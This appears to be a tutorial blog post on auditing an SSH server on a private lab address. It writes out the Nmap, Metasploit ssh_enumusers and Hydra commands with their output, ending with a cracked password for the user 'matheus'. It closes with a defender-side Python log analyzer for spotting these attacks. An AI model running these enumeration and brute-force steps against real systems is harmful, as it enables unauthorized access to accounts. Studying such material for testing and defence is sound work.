Auditing SSH Servers with Hydra and Metasploit Framework

Today I will walk through a single penetration test script against Linux servers, specifically the SSH service: brute-forcing usernames with a timing-based attack to identify valid logins on the system, then running a dictionary attack against the passwords of the users found.

Let's run Nmap against the target host to see what kind of information we can get about it:

 # nmap -sS -sC 192.168.0.34  
 root@fidelis:/home/matheus# nmap -sS -sV -sC 192.168.0.34   
   
 Starting Nmap 6.49BETA5 ( https://nmap.org ) at 2015-11-17 11:31 BRST  
 Nmap scan report for 192.168.0.34  
 Host is up (0.00095s latency).  
 Not shown: 998 closed ports  
 PORT  STATE SERVICE VERSION  
 22/tcp open ssh   OpenSSH 6.0p1 Debian 4 (protocol 2.0)  
 | ssh-hostkey:   
 |  2048 23:e8:e2:93:f7:36:0a:83:ce:83:be:b2:3d:9f:3f:d9 (RSA)  
 |_ 256 92:c9:f2:42:82:a8:c9:8f:2b:28:cb:2e:12:24:80:40 (ECDSA)  
 111/tcp open rpcbind 2-4 (RPC #100000)  
 | rpcinfo:   
 |  program version  port/proto service  
 |  100000 2,3,4    111/tcp rpcbind  
 |_ 100000 2,3,4    111/udp rpcbind  
 MAC Address: 08:00:27:2D:7A:AC (Cadmus Computer Systems)  
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel  
   
 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .  
 Nmap done: 1 IP address (1 host up) scanned in 15.66 seconds  
   

We have identified some open ports and the versions of the services running on them, plus some information that is exposed unnecessarily, such as the SSH host key fingerprints. We also identified the SSH service version: OpenSSH 6.0.

In this example we need two wordlists: a userlist with candidate user names, and a passlist with candidate passwords that we will use to brute-force the passwords of the users we manage to identify.

Let's start the PostgreSQL service and open the Metasploit Framework console.

 # service postgresql start  
 # msfconsole   

We will use a timing-based user enumeration module that ships with Metasploit, auxiliary/scanner/ssh/ssh_enumusers. Let's select it in msfconsole and list the options the module requires.
 msf > use auxiliary/scanner/ssh/ssh_enumusers  
 msf auxiliary(ssh_enumusers) > show options  
   
 Module options (auxiliary/scanner/ssh/ssh_enumusers):  
   
   Name    Current Setting Required Description  
   ----    --------------- -------- -----------  
   Proxies          no     A proxy chain of format type:host:port[,type:host:port][...]  
   RHOSTS           yes    The target address range or CIDR identifier  
   RPORT   22       yes    The target port  
   THREADS  1       yes    The number of concurrent threads  
   THRESHOLD 10     yes    Amount of seconds needed before a user is considered found  
   USER_FILE        yes    File containing usernames, one per line  
   
 msf auxiliary(ssh_enumusers) >   

Here are some important points to consider:

  • RHOSTS: the host (or range) we will test
  • RPORT: the service port, 22 by default
  • THREADS: the number of threads that will work on the attack
  • THRESHOLD: the number of seconds of response delay after which the module considers a user found
  • USER_FILE: the path of the userlist containing the user names

Let's set the module parameters, the target IP and the userlist respectively:

 msf auxiliary(ssh_enumusers) > set RHOSTS 192.168.0.34  
 msf auxiliary(ssh_enumusers) > set USER_FILE /home/matheus/userlist.txt
 msf auxiliary(ssh_enumusers) > run  
   
 [*] 192.168.0.34:22 - SSH - Checking for false positives  
 [*] 192.168.0.34:22 - SSH - Starting scan  
 [-] 192.168.0.34:22 - SSH - User 'Administrator' not found  
 [-] 192.168.0.34:22 - SSH - User 'administrator' not found  
 [-] 192.168.0.34:22 - SSH - User 'test' not found  
 [-] 192.168.0.34:22 - SSH - User 'sysadmin' not found  
 [-] 192.168.0.34:22 - SSH - User 'asd' not found  
 [-] 192.168.0.34:22 - SSH - User 'cienciahacker' not found  
 [-] 192.168.0.34:22 - SSH - User 'root' not found  
 [-] 192.168.0.34:22 - SSH - User 'qwerty' not found  
 [-] 192.168.0.34:22 - SSH - User 'matheus' not found  
 [-] 192.168.0.34:22 - SSH - User 'superuser' not found  
 [-] 192.168.0.34:22 - SSH - User 'security' not found  
 [-] 192.168.0.34:22 - SSH - User 'sysadmin' not found  
 [-] 192.168.0.34:22 - SSH - User 'operator' not found  
 [+] 192.168.0.34:22 - SSH - User 'matheus' found  
   
There it is: we found a valid user named 'matheus'. Let's run the brute force against its password with Hydra:

 # hydra -l matheus -P passlist.txt 192.168.0.34 ssh -v -V  
 Hydra (http://www.thc.org/thc-hydra) starting at 2015-11-17 15:58:53  
 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4  
 [WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...  
 [DATA] max 16 tasks per 1 server, overall 64 tasks, 1656650 login tries (l:1/p:1656650), ~1617 tries per task  
 [DATA] attacking service ssh on port 22  
 [VERBOSE] Resolving addresses ... done  
 [INFO] Testing if password authentication is supported by ssh://192.168.0.34:22  
 [INFO] Successful, password authentication is supported by ssh://192.168.0.34:22  
 [ATTEMPT] target 192.168.0.34 - login "matheus" - pass "!root" - 1 of 1656650 [child 0]  
 [ATTEMPT] target 192.168.0.34 - login "matheus" - pass "0" - 2 of 1656650 [child 1]  
 [ATTEMPT] target 192.168.0.34 - login "matheus" - pass "0000" - 3 of 1656650 [child 2]  
 [ATTEMPT] target 192.168.0.34 - login "matheus" - pass "test" - 4 of 1656650 [child 3]  
 [ATTEMPT] target 192.168.0.34 - login "matheus" - pass "000000" - 5 of 1656650 [child 4]  
 [ATTEMPT] target 192.168.0.34 - login "matheus" - pass "00000000" - 6 of 1656650 [child 5]  
 [ATTEMPT] target 192.168.0.34 - login "matheus" - pass "000007" - 7 of 1656650 [child 6]  
 [ATTEMPT] target 192.168.0.34 - login "matheus" - pass "0007" - 8 of 1656650 [child 7]  
 [ATTEMPT] target 192.168.0.34 - login "matheus" - pass "007007" - 9 of 1656650 [child 8]  
 [ATTEMPT] target 192.168.0.34 - login "matheus" - pass "0311" - 10 of 1656650 [child 9]  
 [ATTEMPT] target 192.168.0.34 - login "matheus" - pass "0660" - 11 of 1656650 [child 10]  
 [ATTEMPT] target 192.168.0.34 - login "matheus" - pass "098765" - 12 of 1656650 [child 11]  
 [ATTEMPT] target 192.168.0.34 - login "matheus" - pass "1" - 13 of 1656650 [child 12]  
 [ATTEMPT] target 192.168.0.34 - login "matheus" - pass "100000" - 14 of 1656650 [child 13]  
 [ATTEMPT] target 192.168.0.34 - login "matheus" - pass "1002" - 15 of 1656650 [child 14]  
 [ATTEMPT] target 192.168.0.34 - login "matheus" - pass "1230" - 49 of 1656652 [child 15]  
 [ATTEMPT] target 192.168.0.34 - login "matheus" - pass "123123" - 50 of 1656652 [child 5]  
 [22][ssh] host: 192.168.0.34  login: matheus  password: winner  
   
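From the defender's side, both steps above leave distinctive traces in sshd's auth log: the userlist scan produces a run of "Invalid user" lines from one source, and the Hydra run produces a run of "Failed password" lines for a single account. The following Python is an added example, not part of the original post: it groups those events per source IP and flags user enumeration, password brute force, and a login that succeeded after either. The log lines are constructed, and the thresholds are assumptions to tune for your environment.

```python
import re
from collections import defaultdict

# Constructed sshd auth.log sample (not from the original post): five unknown
# users probed, then repeated failures for one real user, then a success.
SAMPLE_LOG = """\
Nov 17 11:40:01 fidelis sshd[2001]: Invalid user Administrator from 192.168.0.10
Nov 17 11:40:01 fidelis sshd[2002]: Invalid user test from 192.168.0.10
Nov 17 11:40:02 fidelis sshd[2003]: Invalid user sysadmin from 192.168.0.10
Nov 17 11:40:02 fidelis sshd[2004]: Invalid user security from 192.168.0.10
Nov 17 11:40:03 fidelis sshd[2005]: Invalid user operator from 192.168.0.10
Nov 17 15:58:54 fidelis sshd[2101]: Failed password for matheus from 192.168.0.10 port 50001 ssh2
Nov 17 15:58:54 fidelis sshd[2102]: Failed password for matheus from 192.168.0.10 port 50002 ssh2
Nov 17 15:58:55 fidelis sshd[2103]: Failed password for matheus from 192.168.0.10 port 50003 ssh2
Nov 17 15:58:56 fidelis sshd[2105]: Accepted password for matheus from 192.168.0.10 port 50005 ssh2
Nov 17 16:10:00 fidelis sshd[2200]: Failed password for matheus from 192.168.0.77 port 40000 ssh2
"""

INVALID_RE = re.compile(r"Invalid user (\S+) from (\d+\.\d+\.\d+\.\d+)")
FAILED_RE = re.compile(r"Failed password for (?:invalid user )?(\S+) from (\d+\.\d+\.\d+\.\d+)")
ACCEPTED_RE = re.compile(r"Accepted \w+ for (\S+) from (\d+\.\d+\.\d+\.\d+)")

def analyse(log_text, enum_users=5, brute_failures=3):
    """Tag each source IP with the attack patterns seen; thresholds are assumed values."""
    invalid = defaultdict(set)                      # src -> unknown usernames tried
    failed = defaultdict(lambda: defaultdict(int))  # src -> user -> failed attempts
    accepted = defaultdict(set)                     # src -> users that logged in
    for line in log_text.splitlines():
        if m := INVALID_RE.search(line):
            invalid[m.group(2)].add(m.group(1))
        elif m := FAILED_RE.search(line):
            failed[m.group(2)][m.group(1)] += 1
        elif m := ACCEPTED_RE.search(line):
            accepted[m.group(2)].add(m.group(1))
    findings = {}
    for src in sorted(set(invalid) | set(failed) | set(accepted)):
        tags = []
        enumerated = len(invalid[src]) >= enum_users   # many distinct unknown users
        if enumerated:
            tags.append("user-enumeration")
        brute = sorted(u for u, n in failed[src].items() if n >= brute_failures)
        if brute:
            tags.append("password-brute-force:" + ",".join(brute))
        for user in sorted(accepted[src]):            # success following an attack
            if enumerated or failed[src][user] >= brute_failures:
                tags.append("success-after-attack:" + user)
        if tags:
            findings[src] = tags
    return findings
```

The "success-after-attack" tag is the one worth paging on, since it marks the moment the Hydra run above would have ended. Setting PasswordAuthentication no in sshd_config removes the surface entirely; Hydra's [INFO] line checks exactly whether password authentication is still enabled.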
A video on this topic was contributed to Ciência Hacker.
